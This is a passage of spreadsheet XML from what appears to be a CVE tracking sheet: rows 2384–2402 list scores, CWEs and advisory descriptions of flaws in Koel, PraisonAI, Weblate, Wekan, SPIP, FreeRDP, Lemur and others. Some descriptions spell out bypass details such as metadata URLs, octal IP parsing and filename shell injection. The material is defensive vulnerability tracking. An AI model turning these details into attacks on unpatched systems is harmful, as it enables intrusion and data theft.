    <row r="2384">
      <c r="A2384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54493</t>
        </is>
      </c>
      <c r="C2384" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2384" s="5" t="inlineStr"/>
      <c r="F2384" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2384" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2384" s="5" t="inlineStr"/>
      <c r="I2384" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2384" s="5" t="inlineStr"/>
      <c r="K2384" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2384" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.0, the Subsonic-compatible createInternetRadioStation.view and updateInternetRadioStation.view routes accept an authenticated user's streamUrl without the SafeUrl and HasAudioContentType checks used by the regular radio API. app/Http/Requests/Subsonic/CreateInternetRadioStationRequest.php and app/Http/Requests/Subsonic/UpdateInternetRadioStationRequest.php pass the stored URL through app/Services/RadioService.php to app/Services/Radio/RadioStreamProxy.php, where RadioStreamProxy::openStream() calls fopen($url, 'r', false, $context). Streaming /radio/stream/{id} returns the upstream response body, allowing access to loopback, RFC1918, Docker bridge, metadata, or other internal HTTP services reachable from the Koel server. This issue is fixed in version 9.7.0.</t>
        </is>
      </c>
      <c r="M2384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54493</t>
        </is>
      </c>
    </row>
    <row r="2385">
      <c r="A2385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55523</t>
        </is>
      </c>
      <c r="C2385" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2385" s="5" t="inlineStr"/>
      <c r="F2385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2385" s="5" t="inlineStr"/>
      <c r="H2385" s="5" t="inlineStr"/>
      <c r="I2385" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2385" s="5" t="inlineStr"/>
      <c r="K2385" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2385" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. In versions 1.5.128 through 1.6.57, the praisonaiagents.tools.web_crawl_tools.web_crawl() function is vulnerable to server-side request forgery. While it validates the initially supplied URL and blocks direct loopback and private destinations, its default httpx fallback uses httpx.Client(follow_redirects=True) and does not revalidate intermediate or final redirect targets. An attacker who can influence a URL passed to web_crawl(), directly or through an agent or tool workflow, can supply an attacker-controlled public URL that passes the initial host check and then redirects to loopback, private-network, or cloud metadata endpoints reachable from the host, with the redirected response body returned in the web_crawl() result. This constitutes an incomplete fix and patch bypass for the previously disclosed web_crawl SSRF class (GHSA-qq9r-63f6-v542 / CVE-2026-40160 and GHSA-8f4v-xfm9-3244), since the guard validates only the requested URL and not the destination actually fetched after redirection. This issue has been fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M2385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55523</t>
        </is>
      </c>
    </row>
    <row r="2386">
      <c r="A2386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55658</t>
        </is>
      </c>
      <c r="C2386" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2386" s="5" t="inlineStr"/>
      <c r="F2386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2386" s="5" t="inlineStr"/>
      <c r="H2386" s="5" t="inlineStr"/>
      <c r="I2386" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2386" s="5" t="inlineStr"/>
      <c r="K2386" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2386" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In 3e595f3 and prior, when a streaming proposal is funded, the cluster of streaming contracts moves real pool funds into the proposal's StreamingEscrow to back the Superfluid constant flow agreement (the CFA deposit, plus a 0.5 percent margin). cancelProposal then zeroes the escrow's GDA member units but never reclaims that parked balance, and the permissionless claim() forwards the escrow's entire balance, including the pool funded buffer, to the beneficiary. The beneficiary is chosen by the proposal submitter and defaults to the submitter. The only path that returns escrow funds to the pool is drainToStrategy, which is onlyStrategy and is reached solely from the dispute reject ruling, never from cancel or natural completion. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M2386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55658</t>
        </is>
      </c>
    </row>
    <row r="2387">
      <c r="A2387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57171</t>
        </is>
      </c>
      <c r="C2387" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2387" s="5" t="inlineStr"/>
      <c r="F2387" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2387" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2387" s="5" t="inlineStr"/>
      <c r="I2387" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2387" s="5" t="inlineStr"/>
      <c r="K2387" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2387" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the catalog-generate, profile-generate, and ssp-generate author commands write generated Markdown to an attacker-influenced output path without path-traversal validation, allowing arbitrary file write outside the Trestle workspace. These commands join the user-supplied output argument onto the Trestle root and write to the result, but guard it only with an is_directory_name_allowed() task-name-collision check rather than the PathSecurityValidator.validate_local_path() guard used by the jinja command, so an absolute path or one containing traversal sequences escapes the workspace and writes files under an attacker-chosen location as the invoking process owner. The security boundary is crossed when a trusted CI job, shared service, or wrapper derives the output argument from repository-controlled, tenant-controlled, or otherwise untrusted data while expecting output to stay inside the workspace. When --force-overwrite is used, the selected output directory is first recursively deleted, extending the primitive to destruction of an attacker-chosen directory tree and enabling indirect code execution by overwriting files a pipeline later runs. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M2387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57171</t>
        </is>
      </c>
    </row>
    <row r="2388">
      <c r="A2388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61617</t>
        </is>
      </c>
      <c r="C2388" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2388" s="5" t="inlineStr"/>
      <c r="F2388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2388" s="5" t="inlineStr"/>
      <c r="H2388" s="5" t="inlineStr"/>
      <c r="I2388" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2388" s="5" t="inlineStr"/>
      <c r="K2388" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2388" s="5" t="inlineStr">
        <is>
          <t>Wings is the server control plane for the Pterodactyl game-server management panel. In versions up to and including 1.13.2, the SFTP write path does not enforce a server's disk quota during a transfer, allowing a tenant with SFTP write access to a single server to exhaust the host node's physical disk and take down every server on it. Wings checks available space only once, as a boolean, when the write handle is opened, using a stale cached usage value and without knowing the size of the incoming data, and it then returns a raw, unaccounted file handle that is never re-checked as the transfer proceeds. A single upload can therefore be written without bound, far beyond the configured disk limit, until the node's disk is full, and because a server stopped for exceeding its limit is not treated as suspended, SFTP writes are still accepted even after the quota is already exceeded. This issue is fixed in version 1.13.3.</t>
        </is>
      </c>
      <c r="M2388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61617</t>
        </is>
      </c>
    </row>
    <row r="2389">
      <c r="A2389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61792</t>
        </is>
      </c>
      <c r="C2389" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2389" s="5" t="inlineStr"/>
      <c r="F2389" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2389" s="5" t="inlineStr"/>
      <c r="H2389" s="5" t="inlineStr"/>
      <c r="I2389" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2389" s="5" t="inlineStr"/>
      <c r="K2389" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59, CWE-693</t>
        </is>
      </c>
      <c r="L2389" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a project administrator can read files outside their repository through the App store metadata download feature, which resolves attacker-influenced paths without adequately confining them to the repository. This is an incomplete fix for CVE-2026-34242, whose original patch failed to fully prevent the path traversal, allowing the arbitrary file read to persist. A user with project-administrator privileges can therefore disclose the contents of files on the Weblate host that lie outside the project's repository. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M2389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61792</t>
        </is>
      </c>
    </row>
    <row r="2390">
      <c r="A2390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63464</t>
        </is>
      </c>
      <c r="C2390" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2390" s="5" t="inlineStr"/>
      <c r="F2390" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2390" s="5" t="inlineStr"/>
      <c r="H2390" s="5" t="inlineStr"/>
      <c r="I2390" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2390" s="5" t="inlineStr"/>
      <c r="K2390" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-918</t>
        </is>
      </c>
      <c r="L2390" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. From version 0.6.0 to before version 0.7.2, non-admin operators (role user) can set allow_private: true on their own managed webhook subscription (POST/PATCH /api/v1/webhook-subscriptions). No admin check exists on this field. At delivery time, allow_private switches the dispatcher to an unguarded HTTP client, bypassing the private/loopback/link-local SSRF guard — letting a low-privilege operator make the server request internal addresses. This issue has been patched in version 0.7.2.</t>
        </is>
      </c>
      <c r="M2390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63464</t>
        </is>
      </c>
    </row>
    <row r="2391">
      <c r="A2391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63633</t>
        </is>
      </c>
      <c r="C2391" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2391" s="5" t="inlineStr"/>
      <c r="F2391" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2391" s="5" t="inlineStr"/>
      <c r="H2391" s="5" t="inlineStr"/>
      <c r="I2391" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2391" s="5" t="inlineStr"/>
      <c r="K2391" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2391" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.28.0, freerdp_dsp_decode_opus in libfreerdp/codec/dsp.c calls Stream_EnsureRemainingCapacity on context-&gt;common.buffer even though opus_decode writes decoded PCM into the caller-supplied out stream. A malicious RDP server that negotiates WAVE_FORMAT_OPUS with a client built with WITH_OPUS enabled and WITH_DSP_FFMPEG disabled can make libopus write a large decoded frame beyond the 4096-byte StreamPool_Take destination used by channels/rdpsnd/client/rdpsnd_main.c. This can corrupt the client heap, crash the client, and may permit code execution. This issue is fixed in version 3.28.0.</t>
        </is>
      </c>
      <c r="M2391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63633</t>
        </is>
      </c>
    </row>
    <row r="2392">
      <c r="A2392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66738</t>
        </is>
      </c>
      <c r="C2392" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2392" s="5" t="inlineStr"/>
      <c r="F2392" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2392" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H2392" s="5" t="inlineStr"/>
      <c r="I2392" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2392" s="5" t="inlineStr"/>
      <c r="K2392" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2392" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains a code injection vulnerability in SQLite-backed installations. The navigation menu endpoint improperly handles array-typed user input, which bypasses input sanitization and allows the value to break out of an internal quoted string context when evaluated as PHP. An authenticated attacker with at minimum editor (redacteur) privileges can submit a single crafted GET request to /ecrire/?exec=navigation to execute arbitrary OS commands in the web server process. MySQL-backed installations are not affected.</t>
        </is>
      </c>
      <c r="M2392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66738</t>
        </is>
      </c>
    </row>
    <row r="2393">
      <c r="A2393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="C2393" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2393" s="5" t="inlineStr"/>
      <c r="F2393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2393" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2393" s="5" t="inlineStr"/>
      <c r="I2393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2393" s="5" t="inlineStr"/>
      <c r="K2393" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2393" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Application Server for ABAP and ABAP Platform allows an unauthenticated user to send a specially crafted packet that triggers reprocessing of a previously buffered user request, potentially hijacking another user's session under narrow timing conditions. Successful exploitation could result in high impact on confidentiality and integrity, with low impact on availability of the application.</t>
        </is>
      </c>
      <c r="M2393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="2394">
      <c r="A2394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68560</t>
        </is>
      </c>
      <c r="C2394" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2394" s="5" t="inlineStr"/>
      <c r="F2394" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2394" s="5" t="inlineStr"/>
      <c r="H2394" s="5" t="inlineStr"/>
      <c r="I2394" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2394" s="5" t="inlineStr"/>
      <c r="K2394" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2394" s="5" t="inlineStr">
        <is>
          <t>Wekan is open source kanban built with Meteor. Prior to 9.75, models/fileValidation.js interpolated the uploaded fileObj.path into the administrator-configured externalCommandLine at its {file} placeholder and executed the result through asyncExec, which is promisify(exec) and invokes `/bin/sh -c`. On deployments with an external scanner configured, an authenticated user able to upload an attachment could place shell metacharacters such as command substitutions in the filename and execute commands as the Wekan server process. Version 9.75 adds shellQuote() and passes the file path as a POSIX single-quoted argument so shell metacharacters cannot escape the placeholder. This issue is fixed in version 9.75.</t>
        </is>
      </c>
      <c r="M2394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68560</t>
        </is>
      </c>
    </row>
    <row r="2395">
      <c r="A2395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69192</t>
        </is>
      </c>
      <c r="C2395" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2395" s="5" t="inlineStr"/>
      <c r="F2395" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2395" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2395" s="5" t="inlineStr"/>
      <c r="I2395" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J2395" s="5" t="inlineStr"/>
      <c r="K2395" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L2395" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.3.1, Address4 accepts an octet written with a leading zero and decodes it as decimal, while the WHATWG URL host parser, inet_aton, and getaddrinfo all decode a leading zero as octal. The library and the network stack therefore disagree about which host a string names. new Address4('012.0.0.1') reports correctForm() of 12.0.0.1 and isPrivate() of false, but fetch('http://012.0.0.1/') connects to 10.0.0.1. An application that builds a network trust-boundary decision on these checks, for example a filter intended to block Server-Side Request Forgery, or SSRF, will classify an internal target as external and allow the request. The defect is in the parse gate rather than in any one classifier, so every consumer of Address4 inherits it: isPrivate(), isLoopback(), isLinkLocal(), isCGNAT(), isInSubnet(), isHostInSubnet(), and correctForm() are all computed from the mis-decoded octets. This issue is fixed in version 10.3.1.</t>
        </is>
      </c>
      <c r="M2395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69192</t>
        </is>
      </c>
    </row>
    <row r="2396">
      <c r="A2396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="C2396" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2396" s="5" t="inlineStr"/>
      <c r="F2396" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2396" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2396" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I2396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2396" s="5" t="inlineStr"/>
      <c r="K2396" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2396" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="2397">
      <c r="A2397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70479</t>
        </is>
      </c>
      <c r="C2397" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2397" s="5" t="inlineStr"/>
      <c r="F2397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2397" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2397" s="5" t="inlineStr"/>
      <c r="I2397" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2397" s="5" t="inlineStr"/>
      <c r="K2397" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2397" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.0, with WEB_LOADER_ENGINE=playwright, the Playwright web loader validates only the top-level page request and lets sub-resource requests pass unvalidated. A page supplied by an authenticated user can use JavaScript to reach blocked internal addresses, and returned DOM can include data read from those addresses in web-search or RAG output. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M2397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70479</t>
        </is>
      </c>
    </row>
    <row r="2398">
      <c r="A2398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71303</t>
        </is>
      </c>
      <c r="C2398" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2398" s="5" t="inlineStr"/>
      <c r="F2398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2398" s="5" t="inlineStr"/>
      <c r="H2398" s="5" t="inlineStr"/>
      <c r="I2398" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2398" s="5" t="inlineStr"/>
      <c r="K2398" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2398" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, _validate_acme_url enforced ACME_DIRECTORY_HOST_ALLOWLIST when an authority was created, but PUT /api/1/authorities/ passed options to lemur/authorities/service.py without applying the same check. A user holding an authority role could replace the stored acme_url with an internal service or instance-metadata URL such as 169.254.169.254. The next issuance operation loaded that value and passed it to ClientV2.get_directory, causing an outbound request from the Lemur backend. This bypassed the creation-time mitigation for CVE-2026-55166 and could expose internal services or cloud metadata. The fix revalidates acme_url whenever authority options are updated. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71303</t>
        </is>
      </c>
    </row>
    <row r="2399">
      <c r="A2399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71307</t>
        </is>
      </c>
      <c r="C2399" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2399" s="5" t="inlineStr"/>
      <c r="F2399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2399" s="5" t="inlineStr"/>
      <c r="H2399" s="5" t="inlineStr"/>
      <c r="I2399" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2399" s="5" t="inlineStr"/>
      <c r="K2399" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2399" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, GET /api/1/destinations and GET /api/1/destinations/ relied only on authentication while sibling write handlers required admin_permission. DestinationOutputSchema returned raw options and copied them into pluginOptions without redacting sensitive values. The sftp-destination plugin stored password and privateKeyPass values in plaintext, allowing even a read-only user to retrieve credentials for remote certificate-deployment hosts. The exposed credentials could permit direct access to SFTP systems and TLS material outside the Lemur security boundary. The fix requires administrator permission for destination reads and redacts options marked sensitive. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71307</t>
        </is>
      </c>
    </row>
    <row r="2400">
      <c r="A2400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72762</t>
        </is>
      </c>
      <c r="C2400" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2400" s="5" t="inlineStr"/>
      <c r="F2400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2400" s="5" t="inlineStr"/>
      <c r="H2400" s="5" t="inlineStr"/>
      <c r="I2400" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2400" s="5" t="inlineStr"/>
      <c r="K2400" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L2400" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.67, 2.31.5, and 2.32.1 contain an arbitrary file write vulnerability in the Edit Image node, which passes its output format parameter to the underlying image library without validation. An authenticated user able to run workflows can supply a crafted format value to write arbitrary files outside the node's working directory on the n8n instance.</t>
        </is>
      </c>
      <c r="M2400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72762</t>
        </is>
      </c>
    </row>
    <row r="2401">
      <c r="A2401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72777</t>
        </is>
      </c>
      <c r="C2401" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2401" s="5" t="inlineStr"/>
      <c r="F2401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2401" s="5" t="inlineStr"/>
      <c r="H2401" s="5" t="inlineStr"/>
      <c r="I2401" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2401" s="5" t="inlineStr"/>
      <c r="K2401" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2401" s="5" t="inlineStr">
        <is>
          <t>Next AI Draw.io through 0.4.16 contains a server-side request forgery vulnerability in the POST /api/parse-url endpoint due to hostname validation that only checks string patterns without DNS resolution. Unauthenticated attackers can supply hostnames that bypass string validation but resolve to internal addresses, allowing them to reach arbitrary internal HTTP services and exfiltrate responses including cloud metadata.</t>
        </is>
      </c>
      <c r="M2401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72777</t>
        </is>
      </c>
    </row>
    <row r="2402">
      <c r="A2402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73217</t>
        </is>
      </c>
      <c r="C2402" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2402" s="5" t="inlineStr"/>
      <c r="F2402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2402" s="5" t="inlineStr">
        <is>
          <t>microsoft, python</t>
        </is>
      </c>
      <c r="H2402" s="5" t="inlineStr"/>
      <c r="I2402" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2402" s="5" t="inlineStr"/>
      <c r="K2402" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2402" s="5" t="inlineStr">
        <is>
